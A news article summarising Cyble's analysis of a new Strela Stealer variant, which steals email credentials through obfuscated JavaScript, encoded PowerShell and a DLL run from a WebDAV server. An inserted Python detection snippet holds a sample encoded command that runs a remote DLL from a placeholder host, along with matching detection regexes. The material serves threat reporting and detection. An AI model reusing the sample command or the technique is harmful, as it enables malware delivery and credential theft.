
Cyble reports a new dangerous Strela Stealer avoiding security tools


In a recent blog post, Cyble Research and Intelligence Labs (CRIL) researchers have revealed the discovery of a new variation of the Strela Stealer, marking a significant advancement in malware delivery techniques. This new iteration of the Strela Stealer demonstrates increased sophistication and stealth, highlighting the evolving landscape of cyber threats.

The latest campaign targeting Germany and Spain features versions in German, Spanish, and Basque languages. However, given the adaptable nature of malware, it is likely to be repurposed for other regions as seen with the initial version of the infostealer.

Initially identified by DCSO in 2022, the Strela Stealer is an infostealer designed to pilfer account credentials from popular email clients such as Microsoft Outlook and Mozilla Thunderbird. The malware initially focused on Spanish-speaking users, employing malicious ISO file attachments containing a .lnk file and a polyglot file. Subsequent evolutions involved ZIP attachments to distribute the malware.

The latest variant of the Strela Stealer incorporates heavily obfuscated JavaScript and base64-encoded PowerShell commands, significantly complicating detection and response efforts. Additionally, a new technique involves executing the DLL file directly from a WebDAV server without storing it on disk, enhancing its evasion capabilities.

This sophisticated malware is built to extract email configuration details and gather comprehensive system information, enabling threat actors to conduct reconnaissance and potentially launch further targeted attacks on compromised systems.

The new campaign initiates with a fake invoice notification for a recent purchase accompanied by a ZIP file attachment that contains obfuscated JavaScript code. The code, executed through WScript, launches a base64-encoded PowerShell command that executes a malicious DLL from a WebDAV server using “rundll32.exe” via the export function “Entry.”

By never writing the DLL to disk and instead loading it directly from the WebDAV server, the malware evades file-based detection by security products. The obfuscated JavaScript file uses string substitution to build and run hidden code: it launches the PowerShell command embedded in the script, whose base64-encoded payload contacts the WebDAV server and executes the main payload.
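As an added illustration for defenders (this is not code from Cyble's post), the check below decodes the base64 `-EncodedCommand` argument from constructed process-creation events and flags the chain described above: a script host spawning encoded PowerShell, and rundll32 loading a DLL by export name from a UNC/WebDAV path. Host and file names are placeholders.

```python
import base64
import re
from typing import Optional

def _enc(cmd: str) -> str:
    # PowerShell -EncodedCommand takes base64 of UTF-16LE text
    return base64.b64encode(cmd.encode("utf-16-le")).decode()

# Constructed sample events (parent process, image, command line); hostnames are placeholders.
SAMPLE_EVENTS = [
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         r"rundll32.exe \\webdav.example.invalid@SSL\DavWWWRoot\invoice.dll,Entry")},
    {"parent": "explorer.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -enc " + _enc("Get-Date")},
]

# Accept the common abbreviations of -EncodedCommand
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# rundll32 loading a DLL from a UNC path; WebDAV shares show up as \\host@SSL\DavWWWRoot\...
REMOTE_DLL = re.compile(r"rundll32(?:\.exe)?\s+(\\\\[^\s,]+\.dll)\s*,\s*(\w+)", re.I)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess(event: dict) -> list:
    """Return human-readable findings for one process-creation event."""
    findings = []
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        text = text + " " + decoded  # inspect both the raw and decoded command line
        if event["parent"].lower() == "wscript.exe":
            findings.append("script host spawned encoded PowerShell")
    m = REMOTE_DLL.search(text)
    if m:
        findings.append(f"rundll32 loaded remote DLL {m.group(1)} via export {m.group(2)}")
    return findings

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["parent"], "->", ev["image"], assess(ev) or "clean")
```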

The DLL file uses conditional jump instructions as an anti-analysis trick, making disassembly harder and potentially causing disassemblers to crash. It decrypts additional data stored in its “.data” section using a hardcoded key and extracts the main payload, which then runs inside the “rundll32.exe” process.

Moreover, the malware includes language-based checks to target specific regions within Germany and Spain, indicating a tailored approach to its victims. The full blog post by Cyble provides additional details, MITRE ATT&CK techniques, and around 100 Indicators of Compromise (IoCs) for further investigation.

In conclusion, the emergence of this advanced Strela Stealer variant underscores the continuous evolution and sophistication of cyber threats, emphasizing the need for robust cybersecurity measures to protect against such malicious activities.

